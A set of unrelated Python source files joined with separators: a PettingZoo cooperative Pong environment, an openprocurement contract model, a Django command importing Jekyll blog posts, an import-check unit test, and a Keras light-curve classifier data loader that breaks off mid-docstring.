        self.draw()

    def close(self):
        """Tear down the pygame display window if rendering was enabled."""
        if self.renderOn:
            pygame.event.pump()
            pygame.display.quit()
            self.renderOn = False

    def enable_render(self):
        """Switch from the off-screen Surface to a real display window."""
        self.screen = pygame.display.set_mode(self.screen.get_size())
        self.renderOn = True
        self.draw()

    def render(self, mode='human'):
        """Render to the display ('human') or return an (H, W, 3) array
        ('rgb_array'); returns None in human mode."""
        if not self.renderOn and mode == "human":
            # sets self.renderOn to true and initializes display
            self.enable_render()
        observation = np.array(pygame.surfarray.pixels3d(self.screen))
        if mode == "human":
            pygame.display.flip()
        return np.transpose(observation, axes=(1, 0, 2)) if mode == "rgb_array" else None

    def observe(self):
        """Return the current screen as an (H, W, 3) uint8 array."""
        observation = np.array(pygame.surfarray.pixels3d(self.screen))
        observation = np.rot90(observation, k=3)  # now the obs is laid out as H, W as rows and cols
        observation = np.fliplr(observation)  # laid out in the correct order
        return observation

    def state(self):
        '''
        Returns an observation of the global environment
        '''
        state = pygame.surfarray.pixels3d(self.screen).copy()
        state = np.rot90(state, k=3)
        state = np.fliplr(state)
        return state

    def draw(self):
        """Repaint the frame: black background, both paddles, the ball."""
        pygame.draw.rect(self.screen, (0, 0, 0), self.area)
        self.p0.draw(self.screen)
        self.p1.draw(self.screen)
        self.ball.draw(self.screen)

    def step(self, action, agent):
        """Apply one agent's action; ball physics and reward bookkeeping
        run only after the second agent has moved."""
        # update p0, p1 accordingly
        # action: 0: do nothing,
        # action: 1: p[i] move up
        # action: 2: p[i] move down
        if agent == self.agents[0]:
            # first agent of the cycle also clears last cycle's rewards
            self.rewards = {a: 0 for a in self.agents}
            self.p0.update(self.area, action)
        elif agent == self.agents[1]:
            self.p1.update(self.area, action)
            # do the rest if not done
            if not self.done:
                # update ball position
                self.done = self.ball.update2(self.area, self.p0, self.p1)
                # do the miscellaneous stuff after the last agent has moved
                # reward is the length of time ball is in play
                reward = 0
                # ball is out-of-bounds
                if self.done:
                    reward = self.off_screen_penalty
                    self.score += reward
                if not self.done:
                    self.num_frames += 1
                    reward = self.max_reward / self.max_cycles
                    self.score += reward
                    if self.num_frames == self.max_cycles:
                        self.done = True
                # both agents receive the same (shared) reward
                for ag in self.agents:
                    self.rewards[ag] = reward
                    self.dones[ag] = self.done
                    self.infos[ag] = {}
        if self.renderOn:
            pygame.event.pump()
        self.draw()
def env(**kwargs):
    """Build the AEC environment wrapped with the standard PettingZoo
    sanity wrappers (bounds assertion + API-order enforcement)."""
    wrapped = raw_env(**kwargs)
    wrapped = wrappers.AssertOutOfBoundsWrapper(wrapped)
    wrapped = wrappers.OrderEnforcingWrapper(wrapped)
    return wrapped
parallel_env = parallel_wrapper_fn(env)
class raw_env(AECEnv, EzPickle):
    """AEC wrapper exposing CooperativePong through the PettingZoo API.

    All game state lives in ``self.env`` (a CooperativePong); this class
    forwards reward/done/info dicts and handles agent selection.
    """
    # class env(MultiAgentEnv):
    metadata = {
        'render_modes': ['human', "rgb_array"],
        'name': "cooperative_pong_v5",
        'is_parallelizable': True,
        'render_fps': FPS
    }

    def __init__(self, **kwargs):
        """Store kwargs (for EzPickle/seed re-creation), build the game
        via seed(), and mirror its spaces and bookkeeping dicts."""
        EzPickle.__init__(self, **kwargs)
        self._kwargs = kwargs
        # seed() also constructs self.env with the stored kwargs
        self.seed()
        self.agents = self.env.agents[:]
        self.possible_agents = self.agents[:]
        self._agent_selector = agent_selector(self.agents)
        self.agent_selection = self._agent_selector.reset()
        # spaces
        self.action_spaces = dict(zip(self.agents, self.env.action_space))
        self.observation_spaces = dict(zip(self.agents, self.env.observation_space))
        self.state_space = self.env.state_space
        # dicts
        self.observations = {}
        self.rewards = self.env.rewards
        self.dones = self.env.dones
        self.infos = self.env.infos
        self.score = self.env.score

    def observation_space(self, agent):
        """Per-agent observation space accessor."""
        return self.observation_spaces[agent]

    def action_space(self, agent):
        """Per-agent action space accessor."""
        return self.action_spaces[agent]

    # def convert_to_dict(self, list_of_list):
    #     return dict(zip(self.agents, list_of_list))

    def seed(self, seed=None):
        """(Re)seed the RNG and rebuild the underlying game with it."""
        self.randomizer, seed = seeding.np_random(seed)
        self.env = CooperativePong(self.randomizer, **self._kwargs)

    def reset(self):
        """Reset the game and mirror its fresh bookkeeping dicts."""
        self.env.reset()
        self.agents = self.possible_agents[:]
        self.agent_selection = self._agent_selector.reset()
        self.rewards = self.env.rewards
        self._cumulative_rewards = {a: 0 for a in self.agents}
        self.dones = self.env.dones
        self.infos = self.env.infos

    def observe(self, agent):
        """Return the (shared) screen observation; identical per agent."""
        obs = self.env.observe()
        return obs

    def state(self):
        """Return the global state (full-resolution screen array)."""
        state = self.env.state()
        return state

    def close(self):
        self.env.close()

    def render(self, mode='human'):
        return self.env.render(mode)

    def step(self, action):
        """Validate and apply `action` for the selected agent, then
        advance selection and mirror rewards/dones/infos."""
        if self.dones[self.agent_selection]:
            return self._was_done_step(action)
        agent = self.agent_selection
        if not self.action_spaces[agent].contains(action):
            raise Exception('Action for agent {} must be in Discrete({}).'
                            'It is currently {}'.format(agent, self.action_spaces[agent].n, action))
        self.env.step(action, agent)
        # select next agent and observe
        self.agent_selection = self._agent_selector.next()
        self.rewards = self.env.rewards
        self.dones = self.env.dones
        self.infos = self.env.infos
        self.score = self.env.score
        self._cumulative_rewards[agent] = 0
        self._accumulate_rewards()
# This was originally created, in full, by Ananth Hari in a different repo, and was
# added in by J K Terry (which is why they're shown as the creator in the git history)
|
# -*- coding: utf-8 -*-
from openprocurement.api.roles import RolesFromCsv
from schematics.exceptions import ValidationError
from schematics.types.compound import ModelType
from schematics.types import StringType
from openprocurement.tender.core.models import ContractValue
from openprocurement.api.utils import get_now
from openprocurement.api.models import Model, ListType, Contract as BaseContract, Document
class Contract(BaseContract):
    """Tender contract: extends the base API Contract with a validated
    value, a reference to the awarding award, and attached documents."""

    class Options:
        # Serialization roles are maintained in Contract.csv next to this module.
        roles = RolesFromCsv("Contract.csv", relative_to=__file__)

    value = ModelType(ContractValue)
    awardID = StringType(required=True)
    # BUGFIX: was `default=list()`, which creates ONE list object shared as
    # the default across every Contract instance (mutable-default bug).
    # Passing the callable lets schematics build a fresh list per instance.
    documents = ListType(ModelType(Document, required=True), default=list)

    def validate_awardID(self, data, awardID):
        """Ensure awardID references one of the parent tender's awards."""
        parent = data["__parent__"]
        if awardID and isinstance(parent, Model) and awardID not in [i.id for i in parent.awards]:
            raise ValidationError(u"awardID should be one of awards")

    def validate_dateSigned(self, data, value):
        """Reject contract signature dates that lie in the future."""
        parent = data["__parent__"]
        if value and isinstance(parent, Model) and value > get_now():
            raise ValidationError(u"Contract signature date can't be in the future")
|
import os
import re
import glob
import logging
import itertools
import pytz
import requests
from lxml import etree
import html5lib
import markdown
import yaml
from django.conf import settings
from django.core.files import File
from django.core.files.temp import NamedTemporaryFile
from django.core.management.base import BaseCommand
from django.db import transaction
from django.contrib.sites.models import Site
from django.contrib.redirects.models import Redirect
from django.utils import translation
from django.utils.dateparse import parse_datetime
from django.utils.text import Truncator
from django.utils.html import strip_tags
from django.core.files.uploadedfile import SimpleUploadedFile
from django.template.defaultfilters import slugify
from cms.models.pluginmodel import CMSPlugin
from cms.api import add_plugin
from filer.models import Image, Folder
from djangocms_text_ckeditor.utils import plugin_to_tag
from djangocms_blog.models import Post
from froide.account.models import User
logger = logging.getLogger(__name__)
# Jekyll front-matter delimiter between the YAML header and the post body.
YAML_SEPARATOR = '---\n'
# Characters that are not legal in a slug.
NON_SLUG = re.compile(r'[^-\w]')
# Liquid string tag, e.g. {{ "some text" }} -- captures the quoted text.
LIQUID_STRING = re.compile('\{\{\s*["\']([^"\']+)["\']\s*\}\}')
# Markdown image syntax ![alt](url) -- captures alt text and URL.
MKD_IMAGE = re.compile(r'!\[(.*?)\]\((.*?)\)')
def clean_content(text):
    """Strip blog-export cruft from HTML: empty paragraphs, <br> and
    <center> tags, Liquid string tags (kept as their inner text), and
    markdown image syntax (converted to <img> tags)."""
    for junk in ('<p></p>', '<p> </p>', '<br>', '<center>', '</center>'):
        text = text.replace(junk, '')
    liquid_string = re.compile('\{\{\s*["\']([^"\']+)["\']\s*\}\}')
    mkd_image = re.compile(r'!\[(.*?)\]\((.*?)\)')
    text = liquid_string.sub('\\1', text)
    text = mkd_image.sub('<img src="\\2" alt="\\1"/>', text)
    return text
def get_inner_html(tag):
    """Serialise an element's inner HTML: its leading text plus every
    serialised child (child tails are included by tostring)."""
    parts = [tag.text or '']
    parts.extend(etree.tostring(child).decode('utf-8') for child in tag)
    return ''.join(parts)
def get_text_for_node(n):
    """Concatenate all text beneath node `n`, tags stripped."""
    pieces = list(n.itertext())
    return ''.join(pieces)
def get_date(date_str):
    """Parse an ISO date or datetime string into an aware datetime.

    Date-only strings (10 chars or fewer) get a midnight time appended.
    Naive results are localised to Europe/Berlin; is_dst=None makes
    ambiguous/non-existent local times raise instead of guessing.
    """
    if len(date_str) <= 10:
        date_str = date_str + 'T00:00:00'
    naive = parse_datetime(date_str)
    if naive.tzinfo is not None:
        return naive
    return pytz.timezone("Europe/Berlin").localize(naive, is_dst=None)
def remove_text(content):
    """Parse `content` as HTML and return the body's markup with every
    top-level text node dropped (element children serialised as-is)."""
    builder = html5lib.treebuilders.getTreeBuilder('dom')
    dom = html5lib.html5parser.HTMLParser(tree=builder).parse(content)
    body = dom.getElementsByTagName('body')[0]
    chunks = []
    for child in body.childNodes:
        if child.nodeType == child.TEXT_NODE:
            chunks.append('')
        else:
            chunks.append(child.toxml())
    return ''.join(chunks)
def truncate_text(text):
    """Return the first 50 words of `text` with HTML tags removed."""
    plain = strip_tags(text)
    return Truncator(plain).words(50)
def create_image_plugin(filename, image, parent_plugin, **kwargs):
    """Create and save a djangocms Picture plugin under `parent_plugin`.

    Used for drag-n-drop image insertion with djangocms-text-ckeditor.
    Set TEXT_SAVE_IMAGE_FUNCTION='cmsplugin_filer_image.integrations.ckeditor.create_image_plugin' to enable.

    The filer image comes from kwargs['filer_image'] when given; otherwise
    a new filer Image is created from the `image` file object (rewound
    first) with upload name `filename`. Optional kwargs: 'caption',
    'description', and 'counter' (position offset for batch inserts).
    """
    from djangocms_picture.models import Picture
    from filer.models import Image

    # FIX: removed leftover debug `print(filename, kwargs)`.
    image_plugin = Picture()
    image_plugin.placeholder = parent_plugin.placeholder
    image_plugin.parent = parent_plugin
    # Append after the parent's existing children; 'counter' offsets the
    # position when several plugins are created in one pass.
    image_plugin.position = CMSPlugin.objects.filter(parent=parent_plugin).count() + kwargs.get('counter', 0)
    image_plugin.language = parent_plugin.language
    image_plugin.plugin_type = 'PicturePlugin'
    image_plugin.caption_text = kwargs.get('caption', '')
    if 'filer_image' in kwargs:
        image_model = kwargs['filer_image']
    else:
        image.seek(0)
        image_model = Image.objects.create(
            name=kwargs.get('caption', ''),
            description=kwargs.get('description', ''),
            file=SimpleUploadedFile(name=filename, content=image.read())
        )
    image_plugin.picture = image_model
    image_plugin.save()
    return image_plugin
class Command(BaseCommand):
    """Import Jekyll-style posts (YAML front-matter + HTML/markdown) into
    djangocms-blog Posts, migrating images into filer and creating
    redirects for moved URLs.
    """
    help = "import_blog <directory>"

    def add_arguments(self, parser):
        # `directory` holds the export tree; optional `slug` limits the
        # run to a single post.
        parser.add_argument('directory', type=str)
        parser.add_argument('slug', nargs='?', type=str)

    def handle(self, *args, **options):
        """Walk the export directory and create/update one Post per file."""
        translation.activate(settings.LANGUAGE_CODE)
        self.author_cache = None
        self.SITE = Site.objects.get_current()
        self.filer_folder = {}
        self.image_cache = {}
        directory = options['directory']
        do_slug = options.get('slug', '')
        self.directory = directory
        filenames = itertools.chain(
            glob.glob(os.path.join(directory, '**/*.html')),
            glob.glob(os.path.join(directory, '**/*.markdown')),
            glob.glob(os.path.join(directory, '**/*.md'))
        )
        for item in self.get_posts(filenames):
            if do_slug and do_slug != item['slug']:
                continue
            # NOTE(review): uses the root logger; the module defines
            # `logger = logging.getLogger(__name__)` — logger.info would
            # be consistent with the rest of the project.
            logging.info(u'Processing: %s\n', item['title'])
            link = item.pop('link')
            author = item.pop('author')
            meta = item['meta']
            old_slug = item['slug']
            date = item['date']
            slug = slugify(old_slug)
            lang = item['language']
            with transaction.atomic():
                posts = Post.objects.language(lang).translated(slug=slug)
                if posts:
                    post = posts[0]
                    created = False
                else:
                    post = Post.objects.language(lang).create(**{
                        'author': author,
                        'date_created': date,
                        'date_modified': date,
                        'date_published': date if item['published'] else None,
                        'publish': item['published'],
                        'enable_comments': False,
                        'app_config_id': 1,
                        'title': item['title'],
                        'slug': slug,
                        'post_text': item['content']
                    })
                    created = True
                post.sites.add(self.SITE)
                if created:
                    logging.info(u'Creating: %s\n', item['title'])
                    add_plugin(post.content, 'TextPlugin',
                               settings.LANGUAGE_CODE, body=post.post_text)
                print('Fixing', item['title'], item['slug'])
                self.fix_text_plugin(post, entry_content=item['content'])
                post.save()
                if old_slug != slug:
                    # NOTE(review): old_path is built from the NEW slug;
                    # presumably it should use `old_slug` so the legacy URL
                    # redirects — verify against the live URL scheme.
                    red, created = Redirect.objects.get_or_create(
                        site=self.SITE,
                        old_path='/blog/%s/%s/' % (date.year, slug),
                        new_path=post.get_absolute_url()
                    )
                if meta.get('redirect_from'):
                    red, created = Redirect.objects.get_or_create(
                        site=self.SITE,
                        old_path='/blog/' + meta.get('redirect_from'),
                        new_path='/blog/' + link
                    )

    def get_posts(self, filenames):
        """Yield one parsed post dict per export file."""
        for filename in filenames:
            yield self.get_post(filename)

    def get_post(self, filename):
        """Parse a single Jekyll file named YYYY-MM-DD-slug.ext into a
        post dict (meta, title, link, slug, date, content, ...)."""
        with open(filename) as f:
            content = f.read()
        _, meta, html = content.split(YAML_SEPARATOR)
        # NOTE(review): yaml.load without an explicit Loader is deprecated
        # and unsafe on untrusted input — yaml.safe_load should suffice
        # for plain front-matter; confirm no custom YAML tags are needed.
        meta = yaml.load(meta)
        basename = os.path.basename(filename)
        basename = basename.split('.')[0]
        parts = basename.split('-')
        # Filename encodes the publish date and slug: YYYY-MM-DD-the-slug.
        date = get_date('-'.join(parts[:3]))
        slug = '-'.join(parts[3:])
        link = '%s/%s/' % (date.year, slug)
        if 'date' in meta:
            # Front-matter date (when present) overrides the filename date.
            date = get_date(meta['date'])
        if filename.endswith(('markdown', 'md')):
            html = markdown.markdown(html)
        return {
            'meta': meta,
            'title': meta['title'],
            'link': link,
            'slug': slug,
            'date': date,
            'language': settings.LANGUAGE_CODE,
            'content': clean_content(html),
            'published': meta.get('published', True),
            'author': self.get_author(meta.get('author', None)),
        }

    def get_author(self, name):
        """Map 'First Last' to a User, or None when absent/unknown."""
        if name is None:
            return None
        first_name, last_name = name.split(' ', 1)
        users = User.objects.filter(
            first_name=first_name,
            last_name=last_name
        )
        if not users:
            return None
        return users[0]

    def get_image(self, image_url):
        """Download `image_url` into a temp file; return a File named
        after the URL's basename, or None on a non-200 response."""
        resp = requests.get(image_url)
        if resp.status_code != 200:
            print('Warning: %s does not exist' % image_url)
            return None
        img_tmp = NamedTemporaryFile(delete=False)
        img_tmp.write(resp.content)
        img_tmp.flush()
        img_tmp.close()
        filename = os.path.basename(image_url)
        return File(open(img_tmp.name, 'rb'), name=filename)

    def get_filer_image(self, image_url=None, file_obj=None,
                        name='', description=''):
        """Create a filer Image from a URL or an open file object; returns
        None when the download fails."""
        if image_url is not None:
            file_obj = self.get_image(image_url)
        if file_obj is None:
            return None
        return Image.objects.create(
            name=name,
            description=description,
            original_filename=os.path.basename(file_obj.name),
            file=SimpleUploadedFile(name=file_obj.name, content=file_obj.read())
        )

    def fix_text_plugin(self, entry, entry_content=None):
        """Clean a post's TextPlugin body: strip cruft and <script> tags,
        pull the first <strong> out as the abstract, and re-link images
        via fix_images."""
        placeholder = entry.content
        plugins = placeholder.get_plugins()
        for plugin in plugins:
            if plugin.plugin_type != 'TextPlugin':
                continue
            changed = False
            text_plugin = plugin.djangocms_text_ckeditor_text
            # content = text_plugin.body
            content = entry_content
            cleaned_content = clean_content(content)
            if cleaned_content != content:
                changed = True
                content = cleaned_content
            if not content:
                continue
            dom = etree.fromstring(content, etree.HTMLParser())
            # Drop scripts entirely.
            for script in dom.xpath('.//script'):
                script.getparent().remove(script)
            abstract = None
            # First <strong> becomes the post abstract and leaves the body.
            strongs = dom.xpath('.//strong')
            if len(strongs):
                abstract = get_inner_html(strongs[0])
                strongs[0].getparent().remove(strongs[0])
            changed = self.fix_images(plugin, dom, entry) or changed
            if changed:
                content = ''.join([etree.tostring(n, pretty_print=True).decode('utf-8')
                                   for n in dom.xpath('.//body/*')
                                   ])
                content = content.strip()
                entry.post_text = content
                if abstract is not None:
                    entry.abstract = abstract
                text_plugin.body = content
                text_plugin.save()

    def fix_images(self, plugin, dom, entry):
        """Replace <img> tags with filer-backed PicturePlugins; the first
        image (when the post has no main image yet) becomes the post's
        main image. Returns True when any image was handled."""
        found = False
        CMSPlugin.objects.filter(parent=plugin, plugin_type='PicturePlugin').delete()
        for counter, img in enumerate(dom.xpath('//img')):
            src = img.attrib['src']
            alt = img.attrib.get('alt') or ''
            imgid = img.attrib.get('id')
            logging.info("Extracting image %s: %s", imgid, src)
            print('image src', src)
            # if img.getparent().tag == 'a':
            #     link = img.getparent()
            #     link.getparent().replace(link, img)
            if imgid is not None and imgid.startswith('plugin_obj_'):
                # NOTE(review): rsplit('_', 1)[0] yields the 'plugin_obj'
                # prefix, not the numeric id, and the bare `plugin_id`
                # expression below is a no-op — looks like unfinished code.
                plugin_id = imgid.rsplit('_', 1)[0]
                plugin_id
                continue
            found = True
            image_plugin = None
            filer_image = None
            if src.startswith('http'):
                file_obj = self.get_image(src)
                if file_obj is not None:
                    filer_image = self.get_filer_image(
                        file_obj=file_obj,
                        name=alt
                    )
            else:
                src_part = src.split('/')[-1].lower()
                filer_images = Image.objects.filter(file__endswith=src_part)
                if not filer_images:
                    if src.startswith('/'):
                        # Absolute site path: try the export's sibling folder.
                        src_part = src[1:]
                        print('trying import from local folder')
                        image_file = os.path.join(self.directory, '..', src_part)
                        if os.path.exists(image_file):
                            with open(image_file, 'rb') as file_obj:
                                filer_image = self.get_filer_image(
                                    file_obj=file_obj,
                                    name=alt
                                )
                            print('import success')
                        else:
                            print('image not found at', image_file)
                    else:
                        print('Could not find image', src_part)
                else:
                    filer_image = filer_images[0]
            if not entry.main_image:
                # First image becomes the teaser/main image and is removed
                # from the body.
                entry.main_image = filer_image
                img.getparent().remove(img)
            else:
                image_plugin = create_image_plugin(
                    None, None,
                    filer_image=filer_image,
                    parent_plugin=plugin,
                    caption=alt,
                    description=src,
                    counter=counter
                )
            if image_plugin:
                # render the new html for the plugin
                new_img_html = plugin_to_tag(image_plugin)
                # Get single image element
                new_img = etree.HTML(new_img_html).xpath('.//cms-plugin')[0]
                img.getparent().replace(img, new_img)
        return found
|
'''
testimports.py
Copyright (C) 2013 Liam Deacon
MIT License (see LICENSE file for details)
Test Imports - checks whether key modules and extensions can be imported
'''
import sys,os
import unittest
def isimportable(package, module):
    """
    Determine whether `module` is importable from the given `package`.

    Progress and SUCCESS/FAILED markers are written to stderr; the
    ImportError itself is printed to stdout on failure.

    Returns
    -------
    bool : Result is True if import is successful
    """
    # FIX: use importlib instead of exec'ing a synthesized import
    # statement (exec on formatted strings is fragile and an injection
    # hazard).
    import importlib

    sys.stderr.write('Testing import of %s... ' % module)
    sys.stderr.flush()
    try:
        try:
            importlib.import_module('%s.%s' % (package, module))
        except ImportError:
            # The name may be an attribute of the package (e.g. a compiled
            # extension exposed at package level) rather than a submodule.
            if not hasattr(importlib.import_module(package), module):
                raise
        sys.stderr.write('SUCCESS\n')
        sys.stderr.flush()
        return True
    except ImportError as e:
        sys.stderr.write('FAILED\n')
        sys.stderr.flush()
        print(e)
        return False
imports={'phaseshifts':['libphsh', 'conphas', 'atorb']}
class Test(unittest.TestCase):
    """ Test class for imports """

    def testimports(self):
        """ Function to determine if modules in packages are importable

        Returns
        -------
        FailsIf : any module cannot be imported from a given package
        """
        for package in imports:
            sys.stderr.write('Inspecting package: %s\n' % package)
            modules = imports.get(package)
            # FIX: import from the package being inspected rather than the
            # hard-coded 'phaseshifts' (identical behaviour for the current
            # single-key dict, correct for any future entries).
            successes = [imp for imp in modules
                         if isimportable(package, imp)]
            # FIX: assertFalse replaces failIf, which was deprecated and
            # removed from unittest in Python 3.12.
            self.assertFalse(len(successes) < len(modules))
            sys.stderr.write('Failed to import %i out of %i modules\n\n'
                             % (len(modules) - len(successes),
                                len(modules)))
            sys.stderr.flush()
if __name__ == "__main__":
    # Print a banner identifying this test file, then run unittest.
    #import sys;sys.argv = ['', 'Test.testimports']
    sys.stderr.write('======================================================================\n')
    sys.stderr.write('TESTING: %s\n' % os.path.basename(__file__))
    sys.stderr.write('======================================================================\n')
    unittest.main()
|
# coding: utf-8
from keras.callbacks import EarlyStopping, TensorBoard
from keras.layers import Input, Concatenate, Conv1D
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.models import Model
from keras.utils.training_utils import multi_gpu_model
from sklearn.model_selection import StratifiedKFold, train_test_split
from tqdm import tqdm
import numpy as np
import pandas as pd
import glob, os, random
import argparse
# Construct the argument parser and parse the arguments.
# NOTE(review): parsing happens at import time, so importing this module
# from elsewhere will consume sys.argv.
ap = argparse.ArgumentParser()
ap.add_argument("-g", "--gpus", type=int, default=1,
                help="# of GPUs to use for training")
args = vars(ap.parse_args())
# grab the number of GPUs and store it in a convenience variable
num_gpu = args["gpus"]
## Settings
# Files Setting
limit = 8000  # Maximum amount of Star Per Class Per Survey
extraRandom = True
permutation = True  # Permute Files
BALANCE_DB = True  # Balance or not
maximum = 5
# Mini Settings
MAX_NUMBER_OF_POINTS = 500
NUMBER_OF_POINTS = 500
n_splits = 10
validation_set = 0.2
# Iterations
# NOTE(review): this module-level `step` is shadowed by locals of the same
# name inside the open_* readers.
step = 250
# Network Settings
verbose = True
# NOTE(review): 2056 looks like a typo for 2048 -- confirm before changing.
batch_size = 2056
dropout = 0.5
hidden_dims = 128
epochs = 100
# Convolutions
filters = 128
filters2 = 64
kernel_size = 50
kernel_size2 = 50
# Paths
NombreCarpeta = '10Fold'
base_path = '/mnt/nas2/GrimaRepo/claguirre/Dataset/'
regular_exp = base_path + 'Subclasses/Corot/**/*.csv'
regular_exp2 = base_path + 'Subclasses/**/OGLE-*.dat'
regular_exp3 = base_path + 'Subclasses/VVV/**/*.csv'
## Open Databases
# Variable-star subclasses recognised by the classifier.
subclasses = ['cepDiez', 'cepEfe', 'RRab', 'RRc', 'nonEC', 'EC', 'Mira', 'SRV', 'Osarg']
# subclasses = ['lpv','cep','rrlyr','ecl']
def get_filename(directory, N, early, activation='relu'):
    """Build (creating on demand) the per-activation output directory and
    return (directory_with_trailing_slash, run_name).

    `early` is currently unused here; it is kept for call-site symmetry.
    """
    suffix = {'relu': '/relu/', 'sigmoid': '/sigmoid/'}.get(activation, '/tanh/')
    directory += suffix
    if not os.path.exists(directory):
        print('[+] Creando Directorio \n\t ->', directory)
        os.mkdir(directory)
    name = '1) Red ' + str(N)
    return directory + '/', name
def get_files(extraRandom = False, permutation=False):
    """Collect light-curve paths from the Corot, OGLE and VVV trees,
    optionally shuffled, capped at `limit` files per subclass per survey.

    Returns a list of [path, 0] pairs (the 0 is the augmentation seed used
    later by the open_* readers). `extraRandom` is accepted but unused here.

    NOTE(review): the selection loop is bounded by len(files2) (OGLE), so
    Corot/VVV files beyond that index are never considered -- verify this
    is intentional.
    """
    files1 = np.array(list(glob.iglob(regular_exp, recursive=True)))
    files2 = np.array(list(glob.iglob(regular_exp2, recursive=True)))
    files3 = np.array(list(glob.iglob(regular_exp3, recursive=True)))
    print('[!] Files in Memory')
    # Permutations
    if permutation:
        files1 = files1[np.random.permutation(len(files1))]
        files2 = files2[np.random.permutation(len(files2))]
        files3 = files3[np.random.permutation(len(files3))]
        print('[!] Permutation applied')
    # Per-subclass selection counters, one dict per survey.
    aux_dic = {}
    corot = {}
    vvv = {}
    ogle = {}
    for subclass in subclasses:
        aux_dic[subclass] = []
        corot[subclass] = 0
        vvv[subclass] = 0
        ogle[subclass] = 0
    new_files = []
    for idx in tqdm(range(len(files2))):
        foundCorot = False
        foundVista = False
        foundOgle = False
        for subclass in subclasses:
            # Corot
            if not foundCorot and corot[subclass] < limit and idx < len(files1) and subclass in files1[idx]:
                new_files += [[files1[idx], 0]]
                corot[subclass] += 1
                foundCorot = True
            # Ogle
            if not foundOgle and ogle[subclass] < limit and subclass in files2[idx]:
                new_files += [[files2[idx], 0]]
                ogle[subclass] += 1
                foundOgle = True
            # VVV
            if not foundVista and vvv[subclass] < limit and idx < len(files3) and subclass in files3[idx]:
                new_files += [[files3[idx], 0]]
                vvv[subclass] += 1
                foundVista = True
    del files1, files2, files3
    print('[!] Loaded Files')
    return new_files
def replicate_by_survey(files, yTrain):
    """Replicate each survey's files separately so class balancing happens
    per survey (OGLE, VVV, Corot).

    `files` is an array of [path, num] pairs and `yTrain` the matching
    labels; survey membership is tested by substring on the labels.
    Returns a flat list of [path, num] pairs.
    """
    surveys = ["OGLE", "VVV", "Corot"]
    new_files = []
    for s in surveys:
        # Boolean mask of the samples belonging to survey `s`.
        mask = [s in i for i in yTrain]
        # FIX: dropped the unused local `auxYTrain = yTrain[mask]`.
        new_files += replicate(files[mask])
    return new_files
def replicate(files):
    """Oversample under-represented subclasses up to (roughly) `limit`
    files each.

    Files are bucketed by subclass; each bucket is kept once, then -- when
    smaller than `limit` and `extraRandom` is on -- repeated whole up to
    `maximum - 1` extra times (with an increasing replica counter `num`)
    and topped up with random picks. Returns a list of [path, num] pairs;
    `num` later seeds the augmentation in the open_* readers.
    """
    aux_dic = {}
    for subclass in subclasses:
        aux_dic[subclass] = []
    # Bucket each file under the first subclass appearing in its path.
    for file, num in files:
        for subclass in subclasses:
            if subclass in file:
                aux_dic[subclass].append([file, num])
                break
    new_files = []
    for subclass in subclasses:
        array = aux_dic[subclass]
        length = len(array)
        if length == 0:
            continue
        new_files += array
        if length < limit and extraRandom:
            count = 1
            q = limit // length
            # Whole-bucket repeats, capped at `maximum` passes total.
            for i in range(1, min(q, maximum)):
                for file, num in array:
                    new_files += [[file, count]]
                count += 1
            # Remainder: random picks to approach `limit`.
            r = limit - q*length
            if r > 1:
                new_files += [[random.choice(array)[0], count] for i in range(r)]
    return new_files
def get_survey(path):
    """Identify which survey a light-curve path belongs to ('Corot',
    'VVV' or 'OGLE'); 'err' when none of the markers appears."""
    for survey in ('Corot', 'VVV', 'OGLE'):
        if survey in path:
            return survey
    return 'err'
def get_name(path):
    """Return the first subclass label appearing in `path`, or 'err'."""
    return next((s for s in subclasses if s in path), 'err')
def get_name_with_survey(path):
    """Return '<survey>_<subclass>' for `path`, or 'err' when no known
    subclass appears in it."""
    for subclass in subclasses:
        if subclass not in path:
            continue
        survey = get_survey(path)
        return survey + '_' + subclass
    return 'err'
def open_vista(path, num):
    """Read a VVV light curve (CSV with columns id, mjd, mag, err order
    assumed -- confirm against the data files).

    Applies a random augmentation: subsample with stride 1-2 and drop a
    random prefix of up to `num` points. Returns (time, magnitude, error)
    float arrays; unlike open_corot/open_ogle there is no length cap here
    (create_matrix truncates later).
    """
    df = pd.read_csv(path, comment='#', sep=',')
    df = df[df.mjd > 0]
    df = df.sort_values(by=[df.columns[1]])
    # 3 Desviaciones Standard
    #df = df[np.abs(df.mjd-df.mjd.mean())<=(3*df.mjd.std())]
    time = np.array(df[df.columns[1]].values, dtype=float)
    magnitude = np.array(df[df.columns[2]].values, dtype=float)
    error = np.array(df[df.columns[3]].values, dtype=float)
    # Not Nan: keep rows where both time and magnitude are finite numbers.
    not_nan = np.where(~np.logical_or(np.isnan(time), np.isnan(magnitude)))[0]
    time = time[not_nan]
    magnitude = magnitude[not_nan]
    error = error[not_nan]
    # Num: random stride + random prefix drop (shadows the module-level
    # `step` constant).
    step = random.randint(1, 2)
    count = random.randint(0, num)
    time = time[::step]
    magnitude = magnitude[::step]
    error = error[::step]
    time = time[count:]
    magnitude = magnitude[count:]
    error = error[count:]
    # Get Name of Class
    # folder_path = os.path.dirname(os.path.dirname(os.path.dirname(path)))
    # path, folder_name = os.path.split(folder_path)
    return time.astype('float'), magnitude.astype('float'), error.astype('float')
def open_corot(path, num, n, columns):
    """Read a Corot light curve; `columns` gives the (time, mag, err)
    column indices and `n` caps the number of points returned.

    Same random augmentation as open_vista: stride 1-2 plus a random
    prefix drop of up to `num` points. Returns (time, magnitude, error).
    """
    df = pd.read_csv(path, comment='#', sep=',')
    df = df[df.DATEBARTT > 0]
    df = df.sort_values(by=[df.columns[columns[0]]])
    # 3 Desviaciones Standard
    #df = df[np.abs(df.mjd-df.mjd.mean())<=(3*df.mjd.std())]
    time = np.array(df[df.columns[columns[0]]].values, dtype=float)
    magnitude = np.array(df[df.columns[columns[1]]].values, dtype=float)
    error = np.array(df[df.columns[columns[2]]].values, dtype=float)
    # Not Nan: keep rows where both time and magnitude are finite numbers.
    not_nan = np.where(~np.logical_or(np.isnan(time), np.isnan(magnitude)))[0]
    time = time[not_nan]
    magnitude = magnitude[not_nan]
    error = error[not_nan]
    # Num: random stride + random prefix drop (shadows the module-level
    # `step` constant).
    step = random.randint(1, 2)
    count = random.randint(0, num)
    time = time[::step]
    magnitude = magnitude[::step]
    error = error[::step]
    time = time[count:]
    magnitude = magnitude[count:]
    error = error[count:]
    # Cap the series at n points.
    if len(time) > n:
        time = time[:n]
        magnitude = magnitude[:n]
        error = error[:n]
    # Get Name of Class
    # folder_path = os.path.dirname(os.path.dirname(path))
    # path, folder_name = os.path.split(folder_path)
    return time, magnitude, error
def open_ogle(path, num, n, columns):
    """Read an OGLE light curve (whitespace-separated, headerless, three
